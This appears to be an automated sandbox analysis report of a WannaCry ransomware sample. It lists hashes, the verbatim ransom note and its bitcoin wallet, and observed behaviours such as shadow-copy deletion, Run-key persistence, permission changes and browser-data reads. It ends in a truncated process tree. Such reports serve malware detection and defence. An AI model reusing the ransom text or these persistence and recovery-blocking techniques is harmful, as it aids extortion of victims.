wannacry | 0051fa06a995e0daaa5d8d3a6aded51a32975cc3b2e5f38b5a45c3847501958e

Resubmissions

16-10-2024 19:35

241016-yam35sybkd 10

Analysis

max time kernel
386s
max time network
389s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
16-10-2024 19:35

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

shitting slander.mp4
Size

6.6MB
MD5

828c056e04acd9a83e57815943314c4e
SHA1

c5a76db7258b6489702613d8a44487c9a2e66780
SHA256

0051fa06a995e0daaa5d8d3a6aded51a32975cc3b2e5f38b5a45c3847501958e
SHA512

e86ff8a95cd743fd3d5d9c13f0f46ea7828b1e871dfed8823d91ba82b84c774ed1ad37ef2a844cc3dfd3b7b3e4911ce69731d3b3d4947ad37fde5140877cf523
SSDEEP

196608:YstmfvCUlMA+srvnQmtoOBTWcReW4fm11JqzgCkVL2:ayU1+0nQmtXWc0W4fm1H4gCk92

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops startup file 2 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD5231.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD5238.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 17 IoCs

Processes:

taskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe

pid	Process
4628	taskdl.exe
4120	@[email protected]
5088	@[email protected]
5096	taskhsvc.exe
4324	taskdl.exe
644	taskse.exe
3792	@[email protected]
884	taskdl.exe
756	taskse.exe
3580	@[email protected]
2884	@[email protected]
2008	taskse.exe
3408	@[email protected]
1716	taskdl.exe
2788	taskse.exe
3372	@[email protected]
1712	taskdl.exe

Loads dropped DLL 7 IoCs

Processes:

taskhsvc.exe

pid	Process
5096	taskhsvc.exe
5096	taskhsvc.exe
5096	taskhsvc.exe
5096	taskhsvc.exe
5096	taskhsvc.exe
5096	taskhsvc.exe
5096	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exe

pid	Process
4740	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kxmrwtygyk434 = "\"C:\\Users\\Admin\\Downloads\\RANSOMWARE-WANNACRY-2.0-master\\RANSOMWARE-WANNACRY-2.0-master\\Ransomware.WannaCry\\tasksche.exe\""	reg.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

unregmp2.exe

description	ioc	Process
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\T:	unregmp2.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\J:	unregmp2.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\M:	unregmp2.exe
File opened (read-only)	\??\V:	unregmp2.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\N:	unregmp2.exe
File opened (read-only)	\??\O:	unregmp2.exe
File opened (read-only)	\??\B:	unregmp2.exe
File opened (read-only)	\??\E:	unregmp2.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe@[email protected]

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Windows directory 1 IoCs

Processes:

LogonUI.exe

description	ioc	Process
File created	C:\Windows\rescache\_merged\421858948\2704036608.pri	LogonUI.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cscript.exe@[email protected]YouAreAnIdiot.exeattrib.exeattrib.exetaskse.exeYouAreAnIdiot.exe@[email protected]wmplayer.execmd.execmd.exe@[email protected]setup_wm.exeunregmp2.execmd.exe@[email protected]@[email protected]ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exetaskdl.exe@[email protected]cmd.exe@[email protected]vssadmin.exeYouAreAnIdiot.exeYouAreAnIdiot.exeicacls.exetaskhsvc.exeWMIC.exereg.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YouAreAnIdiot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YouAreAnIdiot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmplayer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_wm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unregmp2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vssadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YouAreAnIdiot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YouAreAnIdiot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Checks processor information in registry 2 TTPs 16 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exefirefox.exefirefox.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

Processes:

vssadmin.exe

pid	Process
4208	vssadmin.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 2 IoCs

Processes:

firefox.exefirefox.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	firefox.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1616	reg.exe

NTFS ADS 3 IoCs

Processes:

firefox.exefirefox.exe

description	ioc	Process
File created	C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master(1).zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\You-Are-An-Idiot-main.zip:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

taskhsvc.exe

pid	Process
5096	taskhsvc.exe
5096	taskhsvc.exe
5096	taskhsvc.exe
5096	taskhsvc.exe
5096	taskhsvc.exe
5096	taskhsvc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

unregmp2.exefirefox.exefirefox.exevssvc.exeWMIC.exetaskse.exetaskse.exetaskse.exetaskse.exe

description	pid	Process
Token: SeShutdownPrivilege	1124	unregmp2.exe
Token: SeCreatePagefilePrivilege	1124	unregmp2.exe
Token: SeDebugPrivilege	4584	firefox.exe
Token: SeDebugPrivilege	4584	firefox.exe
Token: SeDebugPrivilege	4584	firefox.exe
Token: SeDebugPrivilege	4584	firefox.exe
Token: SeDebugPrivilege	4584	firefox.exe
Token: SeDebugPrivilege	4584	firefox.exe
Token: SeDebugPrivilege	4584	firefox.exe
Token: SeDebugPrivilege	2828	firefox.exe
Token: SeDebugPrivilege	2828	firefox.exe
Token: SeDebugPrivilege	2828	firefox.exe
Token: SeBackupPrivilege	5108	vssvc.exe
Token: SeRestorePrivilege	5108	vssvc.exe
Token: SeAuditPrivilege	5108	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2916	WMIC.exe
Token: SeSecurityPrivilege	2916	WMIC.exe
Token: SeTakeOwnershipPrivilege	2916	WMIC.exe
Token: SeLoadDriverPrivilege	2916	WMIC.exe
Token: SeSystemProfilePrivilege	2916	WMIC.exe
Token: SeSystemtimePrivilege	2916	WMIC.exe
Token: SeProfSingleProcessPrivilege	2916	WMIC.exe
Token: SeIncBasePriorityPrivilege	2916	WMIC.exe
Token: SeCreatePagefilePrivilege	2916	WMIC.exe
Token: SeBackupPrivilege	2916	WMIC.exe
Token: SeRestorePrivilege	2916	WMIC.exe
Token: SeShutdownPrivilege	2916	WMIC.exe
Token: SeDebugPrivilege	2916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2916	WMIC.exe
Token: SeRemoteShutdownPrivilege	2916	WMIC.exe
Token: SeUndockPrivilege	2916	WMIC.exe
Token: SeManageVolumePrivilege	2916	WMIC.exe
Token: 33	2916	WMIC.exe
Token: 34	2916	WMIC.exe
Token: 35	2916	WMIC.exe
Token: 36	2916	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2916	WMIC.exe
Token: SeSecurityPrivilege	2916	WMIC.exe
Token: SeTakeOwnershipPrivilege	2916	WMIC.exe
Token: SeLoadDriverPrivilege	2916	WMIC.exe
Token: SeSystemProfilePrivilege	2916	WMIC.exe
Token: SeSystemtimePrivilege	2916	WMIC.exe
Token: SeProfSingleProcessPrivilege	2916	WMIC.exe
Token: SeIncBasePriorityPrivilege	2916	WMIC.exe
Token: SeCreatePagefilePrivilege	2916	WMIC.exe
Token: SeBackupPrivilege	2916	WMIC.exe
Token: SeRestorePrivilege	2916	WMIC.exe
Token: SeShutdownPrivilege	2916	WMIC.exe
Token: SeDebugPrivilege	2916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2916	WMIC.exe
Token: SeRemoteShutdownPrivilege	2916	WMIC.exe
Token: SeUndockPrivilege	2916	WMIC.exe
Token: SeManageVolumePrivilege	2916	WMIC.exe
Token: 33	2916	WMIC.exe
Token: 34	2916	WMIC.exe
Token: 35	2916	WMIC.exe
Token: 36	2916	WMIC.exe
Token: SeTcbPrivilege	644	taskse.exe
Token: SeTcbPrivilege	644	taskse.exe
Token: SeTcbPrivilege	756	taskse.exe
Token: SeTcbPrivilege	756	taskse.exe
Token: SeTcbPrivilege	2008	taskse.exe
Token: SeTcbPrivilege	2008	taskse.exe
Token: SeTcbPrivilege	2788	taskse.exe

Suspicious use of FindShellTrayWindow 16 IoCs

Processes:

firefox.exefirefox.exe@[email protected]

pid	Process
4584	firefox.exe
4584	firefox.exe
4584	firefox.exe
4584	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
3792	@[email protected]
3792	@[email protected]
3792	@[email protected]
3792	@[email protected]
3792	@[email protected]
3792	@[email protected]
3792	@[email protected]

Suspicious use of SendNotifyMessage 7 IoCs

Processes:

firefox.exefirefox.exe

pid	Process
4584	firefox.exe
4584	firefox.exe
4584	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe

Suspicious use of SetWindowsHookEx 49 IoCs

Processes:

firefox.exefirefox.exe@[email protected]@[email protected]@[email protected]YouAreAnIdiot.exe@[email protected]YouAreAnIdiot.exeYouAreAnIdiot.exeYouAreAnIdiot.exe@[email protected]@[email protected]@[email protected]LogonUI.exe

pid	Process
4584	firefox.exe
4584	firefox.exe
4584	firefox.exe
4584	firefox.exe
4584	firefox.exe
4584	firefox.exe
4584	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
2828	firefox.exe
4120	@[email protected]
5088	@[email protected]
4120	@[email protected]
5088	@[email protected]
3792	@[email protected]
3792	@[email protected]
1972	YouAreAnIdiot.exe
1972	YouAreAnIdiot.exe
3580	@[email protected]
1360	YouAreAnIdiot.exe
1360	YouAreAnIdiot.exe
2248	YouAreAnIdiot.exe
2248	YouAreAnIdiot.exe
2908	YouAreAnIdiot.exe
2908	YouAreAnIdiot.exe
2884	@[email protected]
3408	@[email protected]
3372	@[email protected]
644	LogonUI.exe
644	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

wmplayer.exeunregmp2.exefirefox.exefirefox.exe

description	pid	Process	procid_target
PID 164 wrote to memory of 3668	164	wmplayer.exe	73
PID 164 wrote to memory of 3668	164	wmplayer.exe	73
PID 164 wrote to memory of 3668	164	wmplayer.exe	73
PID 164 wrote to memory of 4932	164	wmplayer.exe	74
PID 164 wrote to memory of 4932	164	wmplayer.exe	74
PID 164 wrote to memory of 4932	164	wmplayer.exe	74
PID 4932 wrote to memory of 1124	4932	unregmp2.exe	75
PID 4932 wrote to memory of 1124	4932	unregmp2.exe	75
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 2312 wrote to memory of 4584	2312	firefox.exe	78
PID 4584 wrote to memory of 1716	4584	firefox.exe	79
PID 4584 wrote to memory of 1716	4584	firefox.exe	79
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80
PID 4584 wrote to memory of 4728	4584	firefox.exe	80

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
396	attrib.exe
4420	attrib.exe

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\shitting slander.mp4"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:164
- C:\Program Files (x86)\Windows Media Player\setup_wm.exe
  "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\shitting slander.mp4"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3668
- C:\Windows\SysWOW64\unregmp2.exe
  "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\System32\unregmp2.exe
    "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
    3⤵
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    PID:1124

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2312
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.0.1632826779\482042872" -parentBuildID 20221007134813 -prefsHandle 1700 -prefMapHandle 1516 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f372c4fc-e3e5-4b12-a97d-5439bbbc5097} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 1780 14ba62e6e58 gpu
    3⤵
    PID:1716
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.1.1011365000\1064549107" -parentBuildID 20221007134813 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6255b330-1d12-40cd-9ccd-784d380abfd6} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2136 14ba5e32f58 socket
    3⤵
    - Checks processor information in registry
    PID:4728
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4584.2.380441002\2121190577" -childID 1 -isForBrowser -prefsHandle 2868 -prefMapHandle 2864 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1260 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {568ccfb8-b9a0-494f-8314-053e9829b7c6} 4584 "\\.\pipe\gecko-crash-server-pipe.4584" 2880 14baa59bc58 tab
    3⤵
    PID:2740
- - C:\Program Files\Mozilla Firefox\firefox.exe
